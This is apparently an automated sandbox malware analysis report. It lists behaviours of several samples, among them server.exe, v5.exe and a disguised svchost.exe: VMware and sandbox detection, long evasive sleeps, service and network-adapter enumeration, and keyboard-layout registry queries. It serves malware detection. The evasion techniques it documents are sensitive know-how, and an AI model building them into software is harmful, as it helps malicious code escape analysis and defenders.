Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Windows\Temp\ .exe

Code function: 00-05-69 VMWARE, Inc. 00-0C-29 VMware, Inc.

5_2_00405DB0

Contains functionality to detect sleep reduction / modifications

Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0

Contains functionality to detect virtual machines (IN, VMware)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10001800 in eax, dx

3_2_10001800

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\Temp\v5.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Found stalling execution ending in API Sleep call

Source: C:\Windows\Temp\server.exe

Stalling execution: Execution stalls by calling Sleep

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Contains functionality to enumerate running services

Source: C:\Windows\Temp\server.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		3_2_10010760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		8_2_10010760

Contains functionality to query network adapater information

Source: C:\Windows\Temp\v5.exe	Code function: 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	2_2_00406090
Source: C:\Windows\Temp\v5.exe	Code function: GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount,	4_2_00406090
Source: C:\Windows\Temp\ .exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	5_2_0042E9F0
Source: C:\Windows\Temp\ .exe	Code function: SetTimer,GetAdaptersInfo,	5_2_0042F050

Contains long sleeps (>= 3 min)

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Temp\server.exe	Window / User API: threadDelayed 826	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 504
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 514

Found decision node followed by non-executed suspicious APIs

Source: C:\Windows\Temp\v5.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Temp\server.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\033726\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\Temp\v5.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\033726\svchost.exe

API coverage: 9.0 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100022F0		8_2_100022F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100022F0		3_2_100022F0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep count: 826 > 30	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -148680000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7592	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\server.exe TID: 7476	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7756	Thread sleep time: -2088000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7772	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7752	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\Temp\v5.exe TID: 7688	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep count: 75 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -13500000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7860	Thread sleep count: 253 > 30
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7868	Thread sleep time: -1200000s >= -30000s
Source: C:\Windows\SysWOW64\033726\svchost.exe TID: 7848	Thread sleep time: -180000s >= -30000s

Queries keyboard layouts

Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004001	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C01	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003801	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002401	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000423	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000402	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C04	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000804	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001004	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000404	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000405	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000406	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000465	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000813	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000413	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C09	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000809	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003009	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000425	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000429	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100C	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C07	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001407	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001007	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000807	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000408	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000439	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000040E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000421	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000410	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000810	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000411	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000044B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000412	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000440	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000426	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000427	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000083E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000043E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000450	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000414	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000415	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000416	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000816	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000418	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000419	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C1A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041B	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000424	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00002C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000400A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000340A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000240A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000140A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00001C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000300A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000440A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000100A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000480A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000080A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00004C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000180A	Jump to behavior
